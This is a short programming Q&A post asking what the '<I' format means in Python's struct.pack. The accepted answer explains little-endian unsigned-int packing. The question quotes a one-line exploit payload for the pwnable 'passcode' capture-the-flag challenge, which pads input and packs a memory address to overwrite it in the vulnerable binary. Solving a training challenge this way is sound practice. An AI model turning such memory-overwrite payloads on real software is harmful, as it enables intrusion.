# What is "<I" in inline python code

Tags: python, inline-code

While i was doing challange on pwnable (passcode) I had problem with this.
I found a solution :

```
(python -c 'import struct;print "\x41"*(96)+struct.pack("<I",0x0804a018)+"134514147"' 2>/dev/null) | ./passcode
```

Comment: Have you tried [reading the documentation](https://docs.python.org/3/library/struct.html)?

Answer (score 2, accepted):

This `< I` part is a format string, that says pack to use little-endian byte order unsigned int representation for a value given as a second parameter. 
You can find all this stuff in the [documentation](https://docs.python.org/2/library/struct.html) of the package.